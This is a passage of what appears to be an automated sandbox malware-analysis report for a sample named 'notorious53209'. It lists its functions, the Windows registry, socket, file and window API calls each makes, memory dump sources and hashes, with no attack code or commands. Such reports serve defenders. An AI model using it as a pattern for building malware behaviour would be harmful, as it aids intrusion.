                                                  • Instruction Fuzzy Hash: 1051E4B05086D53DFF3282268C59BBA7EA9FB07304F084589E1D4C6DC2D7A9EC84D751
                                                  Function 008E589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _wcsncpy$LocalTime
                                                  • String ID:
                                                  • API String ID: 2945705084-0
                                                  • Opcode ID: d575a9911f39b6eeec5fe63e3b797376eb9fbf131fcb7fd11a57a586b858b943
                                                  • Instruction ID: 5c8281eb5dff063bd809272249b42fa031c4057b01f818ea7eb533ee5628f9cb
                                                  • Opcode Fuzzy Hash: d575a9911f39b6eeec5fe63e3b797376eb9fbf131fcb7fd11a57a586b858b943
                                                  • Instruction Fuzzy Hash: 1F41B4A5C2012876DB10FBB988869CF77A8FF06710F509462F918E3522F634D755C7A6
                                                  Function 008E38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008E38D3,?), ref: 008E48C7
                                                    • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008E38D3,?), ref: 008E48E0
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 008E38F3
                                                  • _wcscmp.LIBCMT ref: 008E390F
                                                  • MoveFileW.KERNEL32(?,?), ref: 008E3927
                                                  • _wcscat.LIBCMT ref: 008E396F
                                                  • SHFileOperationW.SHELL32(?), ref: 008E39DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                  • String ID: \*.*
                                                  • API String ID: 1377345388-1173974218
                                                  • Opcode ID: 125afe9d7102161af882c8cc488020eebc1d334f1b0dbfe8ca360b2b52b39dfb
                                                  • Instruction ID: 5208bdda6515b1dc5811123a4be52c2447de8cfb0c081590a13859fed7791d55
                                                  • Opcode Fuzzy Hash: 125afe9d7102161af882c8cc488020eebc1d334f1b0dbfe8ca360b2b52b39dfb
                                                  • Instruction Fuzzy Hash: 05416DB24083849EC761EF69C4859DBB7E8FF8A340F10192EB499C3152EB75D688C752
                                                  Function 00907500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00907519
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009075C0
                                                  • IsMenu.USER32(?), ref: 009075D8
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00907620
                                                  • DrawMenuBar.USER32 ref: 00907633
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                  • String ID: 0
                                                  • API String ID: 3866635326-4108050209
                                                  • Opcode ID: 9c795faf01cc081a67f2cd83e553c50bcfb41660cdfdb600bd68354777c83e55
                                                  • Instruction ID: 9875ea033959298d9b67beb23a953e0030f25bee339c8ae95f1a717de6d20763
                                                  • Opcode Fuzzy Hash: 9c795faf01cc081a67f2cd83e553c50bcfb41660cdfdb600bd68354777c83e55
                                                  • Instruction Fuzzy Hash: 27414A75A04608EFDB20DF94D884EAABBF8FF05324F048029F91697290D731AD50DFA1
                                                  Function 0090122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0090125C
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00901286
                                                  • FreeLibrary.KERNEL32(00000000), ref: 0090133D
                                                    • Part of subcall function 0090122D: RegCloseKey.ADVAPI32(?), ref: 009012A3
                                                    • Part of subcall function 0090122D: FreeLibrary.KERNEL32(?), ref: 009012F5
                                                    • Part of subcall function 0090122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00901318
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 009012E0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                  • String ID:
                                                  • API String ID: 395352322-0
                                                  • Opcode ID: 446a3ada143294340012bd2efac537eb9143a17aec924a8ce61e1d02981ad47a
                                                  • Instruction ID: 974a86a28d34efed373078a8cfbc8363af2e0110577dc1a775173a81794479b6
                                                  • Opcode Fuzzy Hash: 446a3ada143294340012bd2efac537eb9143a17aec924a8ce61e1d02981ad47a
                                                  • Instruction Fuzzy Hash: 25315CB1915109BFEB14DB94DC99EFFB7BCEF09300F000169E511E2581EB749F859AA0
                                                  Function 0090653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0090655B
                                                  • GetWindowLongW.USER32(00AD23F8,000000F0), ref: 0090658E
                                                  • GetWindowLongW.USER32(00AD23F8,000000F0), ref: 009065C3
                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009065F5
                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0090661F
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00906630
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0090664A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$MessageSend
                                                  • String ID:
                                                  • API String ID: 2178440468-0
                                                  • Opcode ID: 48dd40e5bf1aca74760e9e04eb9665c84c2ce698189aac5c201e298db64a5e14
                                                  • Instruction ID: 775483ca1ec33792bdb35bd4a16708bdbb2227d47894767d9bf491e271b6e2dc
                                                  • Opcode Fuzzy Hash: 48dd40e5bf1aca74760e9e04eb9665c84c2ce698189aac5c201e298db64a5e14
                                                  • Instruction Fuzzy Hash: 28310075618214AFDB208F28DC89F553BE9FB4A714F1801A8F501CB2F6CB62A960EB41
                                                  Function 008F6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008F80A0: inet_addr.WS2_32(00000000), ref: 008F80CB
                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 008F64D9
                                                  • WSAGetLastError.WS2_32(00000000), ref: 008F64E8
                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 008F6521
                                                  • connect.WSOCK32(00000000,?,00000010), ref: 008F652A
                                                  • WSAGetLastError.WS2_32 ref: 008F6534
                                                  • closesocket.WS2_32(00000000), ref: 008F655D
                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 008F6576
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 910771015-0
                                                  • Opcode ID: e5e6fb5ecbdfc7e6e57f8488929e25e236d5c8984a3e9a13defaf33edfbf8f0a
                                                  • Instruction ID: 5ad11d4f11b1ebc1bb410c65989054c78dc85cd50bb929b8bd629fac64a5a4ce
                                                  • Opcode Fuzzy Hash: e5e6fb5ecbdfc7e6e57f8488929e25e236d5c8984a3e9a13defaf33edfbf8f0a
                                                  • Instruction Fuzzy Hash: 8A31B33160011CAFDB10AF64CC85BBE7BA9FB44714F048169FE46E7291EB70AD14DBA2
                                                  Function 008DE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DE0FA
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DE120
                                                  • SysAllocString.OLEAUT32(00000000), ref: 008DE123
                                                  • SysAllocString.OLEAUT32 ref: 008DE144
                                                  • SysFreeString.OLEAUT32 ref: 008DE14D
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 008DE167
                                                  • SysAllocString.OLEAUT32(?), ref: 008DE175
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: f1fd504efaee231de7a71e4e99ac4a8f5ddf3e75bd37677afc3d65e25cfcaa13
                                                  • Instruction ID: 90481273abc441c6c4ffb37967d3f236cf85a6686e392539c29b27c6a0705b79
                                                  • Opcode Fuzzy Hash: f1fd504efaee231de7a71e4e99ac4a8f5ddf3e75bd37677afc3d65e25cfcaa13
                                                  • Instruction Fuzzy Hash: 17213235604208AFDF20AFA8DC88DAB77ADFB09760B108226F955CB660DA70DD419B64
                                                  Function 0090783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                                    • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                                    • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009078A1
                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009078AE
                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009078B9
                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009078C8
                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009078D4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                  • String ID: Msctls_Progress32
                                                  • API String ID: 1025951953-3636473452
                                                  • Opcode ID: 45674916aad674e9c7d9f28f8b4e6e70a5869568097598799963cc256563d477
                                                  • Instruction ID: 1a1ce6ffeb272801590325e0c94039995a3b99d78ca89a4f70da820b9f26c0bc
                                                  • Opcode Fuzzy Hash: 45674916aad674e9c7d9f28f8b4e6e70a5869568097598799963cc256563d477
                                                  • Instruction Fuzzy Hash: F811B6B2514219BFEF159F60CC85EE77F5DEF48768F018114FA04A2090C772AC21DBA0
                                                  Function 008A41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 008A41E3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 008A41EA
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 008A41F6
                                                  • RtlDecodePointer.NTDLL(00000001), ref: 008A4213
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoInitialize$combase.dll
                                                  • API String ID: 3489934621-340411864
                                                  • Opcode ID: 54a7d21f299d0cd1f1d5722199ce3ca291d882c3667d257f2929df40abf8aaaf
                                                  • Instruction ID: 0bd4d042148d1c881cc35ff4bc2bfe17cbea778dce8db2905e4fb8bdc406cde5
                                                  • Opcode Fuzzy Hash: 54a7d21f299d0cd1f1d5722199ce3ca291d882c3667d257f2929df40abf8aaaf
                                                  • Instruction Fuzzy Hash: 5BE0E5B86B8744AEEB206BB0EC19F443AA4B7AAB46F109424B421E54E0DBB555D5AA00
                                                  Function 008A429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008A41B8), ref: 008A42B8
                                                  • GetProcAddress.KERNEL32(00000000), ref: 008A42BF
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 008A42CA
                                                  • RtlDecodePointer.NTDLL(008A41B8), ref: 008A42E5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoUninitialize$combase.dll
                                                  • API String ID: 3489934621-2819208100
                                                  • Opcode ID: 5cb3b7a6ae022567cb01f1941fdebf0b73e2e3a5f2872093f929d507415d5ae4
                                                  • Instruction ID: 5d4e5b4c462c316eb0a4b3c1bd4a9b7a97b780d2014156f00b3ecfccf2825a5b
                                                  • Opcode Fuzzy Hash: 5cb3b7a6ae022567cb01f1941fdebf0b73e2e3a5f2872093f929d507415d5ae4
                                                  • Instruction Fuzzy Hash: F6E0BF7C66D3019FEB209B60FD1EF443AA4F769B46F205034F011E58A0CBB54694FB14
                                                  Function 008F6E17 Relevance: 9.2, APIs: 6, Instructions: 250networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 008F6F14
                                                  • WSAGetLastError.WS2_32(00000000), ref: 008F6F48
                                                  • htons.WS2_32(?), ref: 008F6FFE
                                                  • inet_ntoa.WS2_32(?), ref: 008F6FBB
                                                    • Part of subcall function 008DAE14: _strlen.LIBCMT ref: 008DAE1E
                                                    • Part of subcall function 008DAE14: _memmove.LIBCMT ref: 008DAE40
                                                  • _strlen.LIBCMT ref: 008F7058
                                                  • _memmove.LIBCMT ref: 008F70C1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                  • String ID:
                                                  • API String ID: 3619996494-0
                                                  • Opcode ID: adf63a76ee5cab22f3d1a8fedd9c270dfab32fd540c1d51c58537f8e1a4c30d2
                                                  • Instruction ID: 213b1a3ceffbf999003e35ee1e0bac71f6db1d7fbd8172d02f0c14d68de72bc9
                                                  • Opcode Fuzzy Hash: adf63a76ee5cab22f3d1a8fedd9c270dfab32fd540c1d51c58537f8e1a4c30d2
                                                  • Instruction Fuzzy Hash: F381BD72508304ABD710EB28CC86E7BB7E9FF84714F144A19F655DB292DA71AD04CB92
                                                  Function 008E675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 3253778849-0
                                                  • Opcode ID: b988335914520bef721cd9ef6a6c77dcc7cd2b99d2a19202a30f694f12b87c20
                                                  • Instruction ID: ebdfd24a58964f9778a096f488cfb7f7840bcfda2c6d43044ff16272c06b1d91
                                                  • Opcode Fuzzy Hash: b988335914520bef721cd9ef6a6c77dcc7cd2b99d2a19202a30f694f12b87c20
                                                  • Instruction Fuzzy Hash: F0618A3050069A9BDF11FF29CC81EFE3BA4FF56348F084519F8959B292EA34AD51CB52
                                                  Function 0090046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 009010A5: CharUpperBuffW.USER32(?,?), ref: 009010BC
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900548
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00900588
                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009005AB
                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009005D4
                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00900617
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00900624
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
